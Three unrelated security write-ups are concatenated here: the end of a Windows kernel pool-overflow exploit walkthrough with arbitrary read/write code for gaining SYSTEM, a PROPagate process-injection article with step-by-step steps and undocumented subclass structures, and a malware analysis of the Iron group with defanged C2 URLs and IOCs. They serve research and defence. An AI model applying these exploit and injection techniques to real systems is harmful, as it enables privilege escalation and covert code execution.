Win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+47

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi]




CONTEXT: ffff8c8f89e98cf0 -- (.cxr 0xffff8c8f89e98cf0)

.cxr 0xffff8c8f89e98cf0

Rax=ffffdb0039e7c080 rbx=ffffd7a7424e4e00 rcx=ffffdb0039e7c080

Rdx=ffffd7a7424e4e00 rsi=00000000001e0000 rdi=ffffd7a740000660

Rip=ffffd7d895bd9847 rsp=ffff8c8f89e996e0 rbp=0000000000000000

R8=ffff8c8f89e996b8 r9=0000000000000001 r10=7ffffffffffffffc

R11=0000000000000027 r12=00000000000000ea r13=ffffd7a740000680

R14=ffffd7a7424dca70 r15=0000000000000027

Iopl=0 nv up ei pl nz na po nc

Cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206

Win32kbase!NSInstrumentation::CTypeIsolation<163840,640>::AllocateType+0x47:

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi] ds:002b:00000000`001e0000=????????????????

After many tracking, I discovered that the main reason for BSOD is that the fake struct we created when using VirtualAllocEx is located in the process space of our current process. This space is not shared by other processes, that is, if we modify the view field through a vulnerability. After the pointer to the CSectionBitmapAllocator, when other processes create the GDI object, it will also traverse the CSecitionEntry. When traversing to the CSectionEntry we modify through the vulnerability, it will generate BSoD because the address space of the process is invalid, so here I did my first fix when the vulnerability was triggered finish.


DWORD64 fix_bitmapbits1 = 0xffffffffffffffff;

DWORD64 fix_bitmapbits2 = 0xffffffffffff;

DWORD64 fix_number = 0x2800000000;

CopyMemory((void *)(fakertl_bitmap + 0x10), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x18), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x20), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x28), &fix_bitmapbits2, 0x8);

CopyMemory((void *)(fakeallocator + 0x20), &fix_number, 0x8);

In the first fix, I modified the bitmap_hint_index and the rtl_bitmap to deceive the typeisolation when traverse the CSectionEntry and think that the view field of the fake CSectionEntry is currently full and will skip this CSectionEntry.

We know that the current CSectionEntry has been modified by us, so even if we end the exploit exit process, the CSectionEntry will still be part of the CTypeIsolation doubly linked list, and when our process exits, The current process space allocated by VirtualAllocEx will be released. This will lead to a lot of unknown errors. We have already had the ability to read and write at any address. So I did my second fix.


ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress, (BYTE *)&CSectionNext, sizeof(DWORD64));

LogMessage(L_INFO, L"Current CSectionEntry->previous: 0x%p", CSePrevious);

LogMessage(L_INFO, L"Current CSectionEntry->next: 0x%p", CSectionNext);

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionNext + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionPrevious, (BYTE *)&CSectionNext, sizeof(DWORD64));

In the second fix, I obtained CSectionEntry->previous and CSectionEntry->next, which unlinks the current CSectionEntry so that when the GDI object allocates traversal CSectionEntry, it will  deal with fake CSectionEntry no longer.

After completing the two fixes, you can successfully use GDI data-only attack to complete any memory address read and write. Here, I directly obtained the SYSTEM permissions for the latest version of Windows10 rs3, but once again when the process completely exits, it triggers BSoD. After the analysis, I found that this BSoD is due to the unlink after, the GDI handle is still stored in the GDI handle table, then it will find the corresponding kernel object in CSectionEntry and free away, and we store the bitmap kernel object CSectionEntry has been unlink, Caused the occurrence of BSoD.

The problem occurs in NtGdiCloseProcess, which is responsible for releasing the GDI object of the current process. The call chain associated with SURFACE is as follows


0e ffff858c`8ef77300 ffff842e`52a57244 win32kbase!SURFACE::bDeleteSurface+0x7ef

0f ffff858c`8ef774d0 ffff842e`52a1303f win32kbase!SURFREF::bDeleteSurface+0x14

10 ffff858c`8ef77500 ffff842e`52a0cbef win32kbase!vCleanupSurfaces+0x87

11 ffff858c`8ef77530 ffff842e`52a0c804 win32kbase!NtGdiCloseProcess+0x11f

bDeleteSurface is responsible for releasing the SURFACE kernel object in the GDI handle table. We need to find the HBITMAP which stored in the fake view in the GDI handle table, and set it to 0x0. This will skip the subsequent free processing in bDeleteSurface. Then call HmgNextOwned to release the next GDI object. The key code for finding the location of HBITMAP in the GDI handle table is in HmgSharedLockCheck. The key code is as follows:


V4 = *(_QWORD *)(*(_QWORD *)(**(_QWORD **)(v10 + 24) + 8 *((unsigned __int64)(unsigned int)v6 >> 8)) + 16i64 * (unsigned __int8 )v6 + 8);

Here I have restored a complete calculation method to find the bitmap object:


*(*(*(*(*win32kbase!gpHandleManager+10)+8)+18)+(hbitmap&0xffff>>8)*8)+hbitmap&0xff*2*8

It is worth mentioning here is the need to leak the base address of win32kbase.sys, in the case of Low IL, we need vulnerability to leak info. And I use NtQuerySystemInformation in Medium IL to leak win32kbase.sys base address to calculate the gpHandleManager address, after Find the position of the target bitmap object in the GDI handle table in the fake view, and set it to 0x0. Finally complete the full exploit.

Now that the exploit of the kernel is getting harder and harder, a full exploitation often requires the support of other vulnerabilities, such as the info leak. Compared to the oob writes, uaf, double free, and write-what-where, the pool overflow is more complicated with this scenario, because it involves CSectionEntry->previous and CSectionEntry->next problems, but it is not impossible to use this scenario in pool overflow.

If you have any questions, welcome to discuss with me. Thank you!

5 Reference

https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/DEFCON-25-5A1F-Demystifying-Kernel-Exploitation-By-Abusing-GDI-Objects.pdf

https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html

https://github.com/sam-b/windows_kernel_address_leaks

New code injection trick named — PROPagate code injection technique

ROPagate code injection technique

@Hexacorn discussed in late 2017 a new code injection technique, which involves hooking existing callback functions in a Window subclass structure. Exploiting this legitimate functionality of windows for malicious purposes will not likely surprise some developers already familiar with hooking existing callback functions in a process. However, it’s still a relatively new technique for many to misuse for code injection, and we’ll likely see it used more and more in future.

For all the details on research conducted by Adam, I suggest the following posts.

 

PROPagate — a new code injection trick

|=======================================================|

Executing code inside a different process space is typically achieved via an injected DLL /system-wide hooks, sideloading, etc./, executing remote threads, APCs, intercepting and modifying the thread context of remote threads, etc. Then there is Gapz/Powerloader code injection (a.k.a. EWMI), AtomBombing, and mapping/unmapping trick with the NtClose patch.

There is one more.

Remember Shatter attacks?

I believe that Gapz trick was created as an attempt to bypass what has been mitigated by the User Interface Privilege Isolation (UIPI). Interestingly, there is actually more than one way to do it, and the trick that I am going to describe below is a much cleaner variant of it – it doesn’t even need any ROP.

There is a class of windows always present on the system that use window subclassing. Window subclassing is just a fancy name for hooking, because during the subclassing process an old window procedure is preserved while the new one is being assigned to the window. The new one then intercepts all the window messages, does whatever it has to do, and then calls the old one.

The ‘native’ window subclassing is done using the SetWindowSubclass API.

When a window is subclassed it gains a new property stored inside its internal structures and with a name depending on a version of comctl32.dll:

  • UxSubclassInfo – version 6.x
  • CC32SubclassInfo – version 5.x

Looking at properties of Windows Explorer child windows we can see that plenty of them use this particular subclassing property:

So do other Windows applications – pretty much any program that is leveraging standard windows controls can be of interest, including say… OllyDbg:When the SetWindowSubclass is called it is using SetProp API to set one of these two properties (UxSubclassInfo, or CC32SubclassInfo) to point to an area in memory where the old function pointer will be stored. When the new message routine is called, it will then call GetProp API for the given window and once its old procedure address is retrieved – it is executed.

Coming back for a moment to the aforementioned shattering attacks. We can’t use SetWindowLong or SetClassLong (or their newer SetWindowLongPtr and SetClassLongPtr alternatives) any longer to set the address of the window procedure for windows belonging to the other processes (via GWL_WNDPROC or GCL_WNDPROC). However, the SetProp function is not affected by this limitation. When it comes to the process at the lower of equal  integrity level the Microsoft documentation says:

SetProp is subject to the restrictions of User Interface Privilege Isolation (UIPI). A process can only call this function on a window belonging to a process of lesser or equal integrity level. When UIPI blocks property changes, GetLastError will return 5.

So, if we talk about other user applications in the same session – there is plenty of them and we can modify their windows’ properties freely!

I guess you know by now where it is heading:

  • We can freely modify the property of a window belonging to another process.
  • We also know some properties point to memory region that store an old address of a procedure of the subclassed window.
  • The routine that address points to will be at some stage executed.

All we need is a structure that UxSubclassInfo/CC32SubclassInfo properties are using. This is actually pretty easy – you can check what SetProp is doing for these subclassed windows. You will quickly realize that the old procedure is stored at the offset 0x14 from the beginning of that memory region (the structure is a bit more complex as it may contain a number of callbacks, but the first one is at 0x14).

So, injecting a small buffer into a target process, ensuring the expected structure is properly filled-in and and pointing to the payload and then changing the respective window property will ensure the payload is executed next time the message is received by the window (this can be enforced by sending a message).

When I discovered it, I wrote a quick & dirty POC that enumerates all windows with the aforementioned properties (there is lots of them so pretty much every GUI application is affected). For each subclassing property found I changed it to a random value – as a result Windows Explorer, Total Commander, Process Hacker, Ollydbg, and a few more applications crashed immediately. That was a good sign. I then created a very small shellcode that shows a Message Box on a desktop window and tested it on Windows 10 (under normal account).

The moment when the shellcode is being called in a first random target (here, Total Commander):

Of course, it also works in Windows Explorer, this is how it looks like when executed:


If we check with Process Explorer, we can see the window belongs to explorer.exe:Testing it on a good ol’ Windows XP and injecting the shellcode into Windows Explorer shows a nice cascade of executed shellcodes for each window exposing the subclassing property (in terms of special effects XP always beats Windows 10 – the latter freezes after first messagebox shows up; and in case you are wondering why it freezes – it’s because my shellcode is simple and once executed it is basically damaging the running application):

For obvious reasons I won’t be attaching the source code.

If you are an EDR or sandboxing vendor you should consider monitoring SetProp/SetWindowSubclass APIs as well as their NT alternatives and system services.

And…

This is not the end. There are many other generic properties that can be potentially leveraged in a very same way:

  • The Microsoft Foundation Class Library (MFC) uses ‘AfxOldWndProc423’ property to subclass its windows
  • ControlOfs[HEX] – properties associated with Delphi applications reference in-memory Visual Component Library (VCL) objects
  • New windows framework e.g. Microsoft.Windows.WindowFactory.* needs more research
  • A number of custom controls use ‘subclass’ and I bet they can be modified in a similar way
  • Some properties expose COM/OLE Interfaces e.g. OleDropTargetInterface

If you are curious if it works between 32- and 64- bit processes

|=======================================================|

 

PROPagate follow-up — Some more Shattering Attack Potentials

|=======================================================|

We now know that one can use SetProp to execute a shellcode inside 32- and 64-bit applications as long as they use windows that are subclassed.

=========================================================

A new trick that allows to execute code in other processes without using remote threads, APC, etc. While describing it, I focused only on 32-bit architecture. One may wonder whether there is a way for it to work on 64-bit systems and even more interestingly – whether there is a possibility to inject/run code between 32- and 64- bit processes.

To test it, I checked my 32-bit code injector on a 64-bit box. It crashed my 64-bit Explorer.exe process in no time.

So, yes, we can change properties of windows belonging to 64-bit processes from a 32-bit process! And yes, you can swap the subclass properties I described previously to point to your injected buffer and eventually make the payload execute! The reason it works is that original property addresses are stored in lower 32-bit of the 64-bit offset. Replacing that lower 32-bit part of the offset to point to a newly allocated buffer (also in lower area of the memory, thanks to VirtualAllocEx) is enough to trigger the code execution.

See below the GetProp inside explorer.exe retrieving the subclassed property:

So, there you have it… 32 process injecting into 64-bit process and executing the payload w/o heaven’s gate or using other undocumented tricks.

The below is the moment the 64-bit shellcode is executed:

p.s. the structure of the subclassed callbacks is slightly different inside 64-bit processes due to 64-bit offsets, but again, I don’t want to make it any easier to bad guys than it should be 🙂

=========================================================

There are more possibilities.

While SetWindowLong/SetWindowLongPtr/SetClassLong/SetClassLongPtr are all protected and can be only used on windows belonging to the same process, the very old APIs SetWindowWord and SetClassWord … are not.

As usual, I tested it enumerating windows running a 32-bit application on a 64-bit system and setting properties to unpredictable values and observing what happens.

It turns out that again, pretty much all my Window applications crashed on Window 10. These 16 bits seem to be quite powerful…

I am not a vulnerability researcher, but I bet we can still do something interesting; I will continue poking around. The easy wins I see are similar to SetProp e.g. GWL_USERDATA may point to some virtual tables/pointers; the DWL_USER – as per Microsoft – ‘sets new extra information that is private to the application, such as handles or pointers’. Assuming that we may only modify 16 bit of e.g. some offset, redirecting it to some code cave or overwriting unused part of memory within close proximity of the original offset could allow for a successful exploit.

|=======================================================|

 

PROPagate follow-up #2 — Some more Shattering Attack Potentials

|=======================================================|

A few months back I discovered a new code injection technique that I named PROPagate. Using a subclass of a well-known shatter attack one can modify the callback function pointers inside other processes by using Windows APIs like SetProp, and potentially others. After pointing out a few ideas I put it on a back burner for a while, but I knew I will want to explore some more possibilities in the future.

In particular, I was curious what are the chances one could force the remote process to indirectly call the ‘prohibited’ functions like SetWindowLong, SetClassLong (or their newer alternatives SetWindowLongPtr and SetClassLongPtr), but with the arguments that we control (i.e. from a remote process). These API are ‘prohibited’ because they can only be called in a context of a process that owns them, so we can’t directly call them and target windows that belong to other processes.

It turns out his may be possible!

If there is one common way of using the SetWindowLong API it is to set up pointers, and/or filling-in window-specific memory areas (allocated per window instance) with some values that are initialized immediately after the window is created. The same thing happens when the window is destroyed – during the latter these memory areas are usually freed and set to zeroes, and callbacks are discarded.

These two actions are associated with two very specific window messages:

  • WM_NCCREATE
  • WM_NCDESTROY

In fact, many ‘native’ windows kick off their existence by setting some callbacks in their message handling routines during processing of these two messages.

With that in mind, I started looking at existing processes and got some interesting findings. Here is a snippet of a routine I found inside Windows Explorer that could be potentially abused by a remote process:

Or, it’s disassembly equivalent (in response to WM_NCCREATE message):

So… since we can still freely send messages between windows it would seem that there is a lot of things that can be done here. One could send a specially crafted WM_NCCREATE message to a window that owns this routine and achieve a controlled code execution inside another process (the lParam needs to pass the checks and include pointer to memory area that includes a callback that will be executed afterwards – this callback could point to malicious code). I may be of course wrong, but need to explore it further when I find more time.

The other interesting thing I noticed is that some existing windows procedures are already written in a way that makes it harder to exploit this issue. They check if the window-specific data was set, and only if it was NOT they allow to call the SetWindowLong function. That is, they avoid executing the same initialization code twice.

|=======================================================|

 

No Proof of Concept?

Let’s be honest with ourselves, most of the “good” code injection techniques used by malware authors today are the brainchild of some expert(s) in the field of computer security. Take for example Process HollowingAtomBombing and the more recent Doppelganging technique.

On the likelihood of code being misused, Adam didn’t publish a PoC, but there’s still sufficient information available in the blog posts for a competent person to write their own proof of concept, and it’s only a matter of time before it’s used in the wild anyway.

Update: After publishing this, I discovered it’s currently being used by SmokeLoader but using a different approach to mine by using SetPropA/SetPropW to update the subclass procedure.

I’m not providing source code here either, but given the level of detail, it should be relatively easy to implement your own.

Steps to PROPagate.

  1. Enumerate all window handles and the properties associated with them using EnumProps/EnumPropsEx
  2. Use GetProp API to retrieve information about hWnd parameter passed to WinPropProc callback function. Use “UxSubclassInfo” or “CC32SubclassInfo” as the 2nd parameter.
    The first class is for systems since XP while the latter is for Windows 2000.
  3. Open the process that owns the subclass and read the structures that contain callback functions. Use GetWindowThreadProcessId to obtain process id for window handle.
  4. Write a payload into the remote process using the usual methods.
  5. Replace the subclass procedure with pointer to payload in memory.
  6. Write the structures back to remote process.

At this point, we can wait for user to trigger payload when they activate the process window, or trigger the payload via another API.

Subclass callback and structures

Microsoft was kind enough to document the subclass procedure, but unfortunately not the internal structures used to store information about a subclass, so you won’t find them on MSDN or even in sources for WINE or ReactOS.

typedef LRESULT (CALLBACK *SUBCLASSPROC)(
   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

Some clever searching by yours truly eventually led to the Windows 2000 source code, which was leaked online in 2004. Behold, the elusive undocumented structures found in subclass.c!

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
} SUBCLASS_CALL, *PSUBCLASS_CALL;
typedef struct _SUBCLASS_FRAME {
  UINT    uCallIndex;   // index of next callback to call
  UINT    uDeepestCall; // deepest uCallIndex on stack
// previous subclass frame pointer
  struct _SUBCLASS_FRAME  *pFramePrev;
// header associated with this frame 
  struct _SUBCLASS_HEADER *pHeader;     
} SUBCLASS_FRAME, *PSUBCLASS_FRAME;
typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId; // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array
} SUBCLASS_HEADER, *PSUBCLASS_HEADER;

At least now there’s no need to reverse engineer how Windows stores information about subclasses. Phew!

Finding suitable targets

I wrongly assumed many processes would be vulnerable to this injection method. I can confirm ollydbg and Process Hacker to be vulnerable as Adam mentions in his post, but I did not test other applications. As it happens, only explorer.exe seemed to be a viable target on a plain Windows 7 installation. Rather than search for an arbitrary process that contained a subclass callback, I decided for the purpose of demonstrations just to stick with explorer.exe.

The code first enumerates all properties for windows created by explorer.exe. An attempt is made to request information about “UxSubclassInfo”, which if successful will return an address pointer to subclass information in the remote process.

Figure 1. shows a list of subclasses associated with process id. I’m as perplexed as you might be about the fact some of these subclass addresses appear multiple times. I didn’t investigate.

Figure 1: Address of subclass information and process id for explorer.exe

Attaching a debugger to process id 5924 or explorer.exe and dumping the first address provides the SUBCLASS_HEADER contents. Figure 2 shows the data for header, with 2 hi-lighted values representing the callback functions.

Figure 2 : Dump of SUBCLASS_HEADER for address 0x003A1BE8

Disassembly of the pointer 0x7448F439 shows in Figure 3 the code is CallOriginalWndProc located in comctl32.dll

Figure 3 : Disassembly of callback function for SUBCLASS_CALL

Okay! So now we just read at least one subclass structure from a target process, change the callback address, and wait for explorer.exe to execute the payload. On the other hand, we could write our own SUBCLASS_HEADER to remote memory and update the existing subclass window with SetProp API.

To overwrite SUBCLASS_HEADER, all that’s required is to replace the pointer pfnSubclass with address of payload, and write the structure back to memory. Triggering it may be required unless someone is already using the operating system.

One would be wise to restore the original callback pointer in subclass header after payload has executed, in order to avoid explorer.exe crashing.

Update: Smoke Loader probably initializes its own SUBCLASS_HEADER before writing to remote process. I think either way is probably fine. The method I used didn’t call SetProp API.

Detection

The original author may have additional information on how to detect this injection method, however I think the following strings and API are likely sufficient to merit closer investigation of code.

Strings

  • UxSubclassInfo
  • CC32SubclassInfo
  • explorer.exe

API

  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory
  • GetPropA/GetPropW
  • SetPropA/SetPropW

Conclusion

This injection method is trivial to implement, and because it affects many versions of Windows, I was surprised nobody published code to show how it worked. Nevertheless, it really is just a case of hooking callback functions in a remote process, and there are many more just like subclass. More to follow!

Iron Group’s Malware using HackingTeam’s Leaked RCS source code with VMProtected Installer — Technical Analysis

In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code. We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.

During the past year and a half, the Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.

In this technical blog post we are going to take a look at the malware samples found during the research.

Technical Analysis:

Installer:

** This installer sample (and in general most of the samples found) is protected with VMProtect then compressed using UPX.

Installation process:

1. Check if the binary is executed on a VM, if so – ExitProcess

2. Drop & Install malicious chrome extension
%localappdata%\Temp\chrome.crx
3. Extract malicious chrome extension to %localappdata%\Temp\chrome & create a scheduled task to execute %localappdata%\Temp\chrome\sec.vbs.
4. Create mutex using the CPU’s version to make sure there’s no existing running instance of itself.
5. Drop backdoor dll to %localappdata%\Temp\\<random>.dat.
6. Check OS version:
.If Version == Windows XP then just invoke ‘Launch’ export of Iron Backdoor for a one-time non persistent execution.
.If Version > Windows XP
-Invoke ‘Launch’ export
-Check if Qhioo360 – only if not proceed, Install malicious certificate used to sign Iron Backdoor binary as root CA.Then create a service called ‘helpsvc’ pointing back to Iron Backdoor dll.

Using the leaked HackingTeam source code:

Once we Analyzed the backdoor sample, we immediately noticed it’s partially based on HackingTeam’s source code for their Remote Control System hacking tool, which leaked about 3 years ago. Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam’s source in both IronStealer and Iron ransomware.

1.Anti-VM: Iron Backdoor uses a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant leaked source code. This piece of code supports detecting Cuckoo Sandbox, VMWare product & Oracle’s VirtualBox. Screenshot:

 

2. Dynamic Function Calls: Iron Backdoor is also using the DynamicCall module from HackingTeam’s “core” library. This module is used to dynamically call external library function by obfuscated the function name, which makes static analysis of this malware more complex.
In the following screenshot you can see obfuscated “LFSOFM43/EMM” and “DsfbufGjmfNbqqjohB”, which represents “kernel32.dll” and “CreateFileMappingA” API.

For a full list of obfuscated APIs you can visit obfuscated_calls.h.

Malicious Chrome extension:

A patched version of the popular Adblock Plus chrome extension is used to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.


**patched include.preload.js injects two malicious scripts from the attacker’s Pastebin account.

The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it as you can see in the following screenshot:

Internet Explorer(deprecated):

Iron Backdoor itself embeds adblockplusie – Adblock Plus for IE, which is modified in a similar way to the malicious chrome extension, injecting remote javascript. It seems that this functionality is no longer automatically used for some unknown reason.

Persistence:

Before installing itself as a Windows service, the malware checks for the presence of either 360 Safe Guard or 360 Internet Security by reading following registry keys:

.SYSTEM\CurrentControlSet\Services\zhudongfangyu.
.SYSTEM\CurrentControlSet\Services\360rp

If one of these products is installed, the malware will only run once without persistence. Otherwise, the malware will proceed to installing rouge, hardcoded root CA certificate on the victim’s workstation. This fake root CA supposedly signed the malware’s binaries, which will make them look legitimate.

Comic break: The certificate is protected by the password ‘caonima123’, which means “f*ck your mom” in Mandarin.

IronStealer (<RANDOM>.dat):

Persistent backdoor, dropper and cryptocurrency theft module.

1. Load Cobalt Strike beacon:
The malware automatically decrypts hard coded shellcode stage-1, which in turn loads Cobalt Strike beacon in-memory, using a reflective loader:

Beacon: hxxp://dazqc4f140wtl.cloudfront[.]net/ZZYO

2. Drop & Execute payload: The payload URL is fetched from a hardcoded Pastebin paste address:

We observed two different payloads dropped by the malware:

1. Xagent – A variant of “JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms. JbossMiner is using known database vulnerabilities to spread. “Xagent” is the original filename Xagent<VER>.exe whereas <VER> seems to be the version of the worm. The last version observed was version 6 (Xagent6.exe).

**Xagent versions 4-6 as seen by VT

2. Iron ransomware – We recently saw a shift from dropping Xagent to dropping Iron ransomware. It seems that the wallet & payment portal addresses are identical to the ones that Bart observed. Requested ransom decreased from 0.2 BTC to 0.05 BTC, most likely due to the lack of payment they received.

**Nobody paid so they decreased ransom to 0.05 BTC

3. Stealing cryptocurrency from the victim’s workstation: Iron backdoor would drop the latest voidtool Everything search utility and actually silent install it on the victim’s workstation using msiexec. After installation was completed, Iron Backdoor uses Everything in order to find files that are likely to contain cryptocurrency wallets, by filename patterns in both English and Chinese.

Full list of patterns extracted from sample:
– Wallet.dat
– UTC–
– Etherenum keystore filename
– *bitcoin*.txt
– *比特币*.txt
– “Bitcoin”
– *monero*.txt
– *门罗币*.txt
– “Monroe Coin”
– *litecoin*.txt
– *莱特币*.txt
– “Litecoin”
– *Ethereum*.txt
– *以太币*.txt
– “Ethereum”
– *miner*.txt
– *挖矿*.txt
– “Mining”
– *blockchain*.txt
– *coinbase*

4. Hijack on-going payments in cryptocurrency: IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account:

Pastebin Account:

As part of the investigation, we also tried to figure out what additional information we may learn from the attacker’s Pastebin account:

The account was probably created using the mail fineisgood123@gmail[.]com – the same email address used to register blockbitcoin[.]com (the attacker’s crypto-mining pool & malware host) and swb[.]one (Old server used to host malware & leaked files. replaced by u.cacheoffer[.]tk):

1. Index.html: HTML page referring to a fake Firefox download page.
2. crystal_ext-min + angular: JS inject using malicious Chrome extension.
3. android: This paste holds a command line for an unknown backdoored application to execute on infected Android devices. This command line invokes remote Metasploit stager (android.apk) and drops cpuminer 2.3.2 (minerd.txt) built for ARM processor. Considering the last update date (18/11/17) and the low number of views, we believe this paste is obsolete.

4. androidminer: Holds the cpuminer command line to execute for unknown malicious android applications, at the time of writing this post, this paste received nearly 2000 hits.

Aikapool[.]com is a public mining pool and port 7915 is used for DogeCoin:

The username (myapp2150) was used to register accounts in several forums and on Reddit. These accounts were used to advertise fake “blockchain exploit tool”, which infects the victim’s machine with Cobalt Strike, using a similar VBScript to the one found by Malwrologist (ps5.sct).

XAttacker: Copy of XAttacker PHP remote file upload script.
miner: Holds payload URL, as mentioned above (IronStealer).

FAQ:

How many victims are there?
It is hard to define for sure, , but to our knowledge, the total of the attacker’s pastes received around 14K views, ~11K for dropped payload URL and ~2k for the android miner paste. Based on that, we estimate that the group has successfully infected, a few thousands victims.

Who is Iron group?
We suspect that the person or persons behind the group are Chinese, due in part to the following findings:
. There were several leftover comments in the plugin in Chinese.
. Root CA Certificate password (‘f*ck your mom123’ was in Mandarin)
We also suspect most of the victims are located in China, because of the following findings:
. Searches for wallet file names in Chinese on victims’ workstations.
. Won’t install persistence if Qhioo360(popular Chinese AV) is found

IOCS:

 

  • blockbitcoin[.]com
  • pool.blockbitcoin[.]com
  • ssl2.blockbitcoin[.]com
  • xmr.enjoytopic[.]tk
  • down.cacheoffer[.]tk
  • dzebppteh32lz.cloudfront[.]net
  • dazqc4f140wtl.cloudfront[.]net
  • androidapt.s3-accelerate.amazonaws[.]com
  • androidapt.s3-accelerate.amazonaws[.]com
  • winapt.s3-accelerate.amazonaws[.]com
  • swb[.]one
  • bitcoinwallet8[.]com
  • blockchaln[.]info
  • 6350a42d423d61eb03a33011b6054fb7793108b7e71aee15c198d3480653d8b7
  • a4faaa0019fb63e55771161e34910971fd8fe88abda0ab7dd1c90cfe5f573a23
  • ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9
  • 654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190
  • 980a39b6b72a7c8e73f4b6d282fae79ce9e7934ee24a88dde2eead0d5f238bda
  • 39a991c014f3093cdc878b41b527e5507c58815d95bdb1f9b5f90546b6f2b1f6
  • a3c8091d00575946aca830f82a8406cba87aa0b425268fa2e857f98f619de298
  • 0f7b9151f5ff4b35761d4c0c755b6918a580fae52182de9ba9780d5a1f1beee8
  • ea338755e8104d654e7d38170aaae305930feabf38ea946083bb68e8d76a0af3
  • 4de16be6a9de62b1ff333dd94e63128e677eb6a52d9fbbe55d8a09a2cab161f1
  • 92b4eed5d17cb9892a9fe146d61787025797e147655196f94d8eaf691c34be8c
  • 6314162df5bc2db1200d20221641abaac09ac48bc5402ec29191fd955c55f031
  • 7f3c07454dab46b27e11fcefd0101189aa31e84f8498dcb85db2b010c02ec190
  • 927e61b57c124701f9d22abbc72f34ebe71bf1cd717719f8fc6008406033b3e9
  • f1cbacea1c6d05cd5aa6fc9532f5ead67220d15008db9fa29afaaf134645e9de
  • 1d34a52f9c11d4bf572bf678a95979046804109e288f38dfd538a57a12fc9fd1
  • 2f5fb4e1072044149b32603860be0857227ed12cde223b5be787c10bcedbc51a
  • 0df1105cbd7bb01dca7e544fb22f45a7b9ad04af3ffaf747b5ecc2ffcd8c6dee
  • 388c1aecdceab476df8619e2d722be8e5987384b08c7b810662e26c42caf1310
  • 0b8473d3f07a29820f456b09f9dc28e70af75f9dec88668fb421a315eec9cb63
  • 251345b721e0587f1f08f54a81e26abac075acf3c4473a2c3ba8efcedc3b2459
  • b1fe223cbb01ff2a658c8ff51d386b5df786fd36278ee081c714adf946145047
  • 2886e25a86a57355a8a09a84781a9b032de10c3e40339a9ad0c10b63f7f8e7c7
  • 1d17eb102e75c08ab6f54387727b12ec9f9ee1960c8e5dc7f9925d41a943cabf
  • 5831dabe27e0211028296546d4e637770fd1ec5f2c8c5add51d0ea09b6ea3f0d
  • 85b0d44f3e8fd636a798960476a1f71d6fe040fbe44c92dfa403d0d014ff66cc
  • 936f4ce3570017ef5db14fb68f5e775a417b65f3b07094475798f24878d84907
  • 484b4cd953c9993090947fbb31626b76d7eee60c106867aa17e408556d27b609
  • 1cbd51d387561cafddf10699177a267cd5d2d184842bb43755a0626fdc4f0f3c
  • e41a805d780251cb591bcd02e5866280f8a99f876cfa882b557951e30dfdd142
  • b8107197469839a82cae25c3d3b5c25b5c0784736ca3b611eb3e8e3ced8ec950
  • b0442643d321003af965f0f41eb90cff2a198d11b50181ef8b6f530dd22226a7
  • 657a3a4a78054b8d6027a39a5370f26665ee10e46673a1f4e822a2a31168e5f9
  • 5977bee625ed3e91c7f30b09be9133c5838c59810659057dcfd1a5e2cf7c1936
  • 9ea69b49b6707a249e001b5f2caaab9ee6f6f546906445a8c51183aafe631e9f
  • 283536c26bb4fd4ea597d59c77a84ab812656f8fe980aa8556d44f9e954b1450
  • 21f1a867fa6a418067be9c68d588e2eeba816bffcb10c9512f3b7927612a1221
  • 45f794304919c8aa9282b0ee84c198703a41cc2254fe93634642ada3511239d2
  • 70e47fdff286fdfe031d05488bc727f5df257eacaa0d29431fb69ce680f6fb0c
  • ce7161381a0a0495ef998b5e202eb3e8fa2945dfdba0fd2a612d68b986c92678
  • b8d548ab2a1ce0cf51947e63b37fe57a0c9b105b2ef36b0abc1abf26d848be00
  • 74e777af58a8ee2cff4f9f18013e5b39a82a4c4f66ea3e17d06e5356085265b7
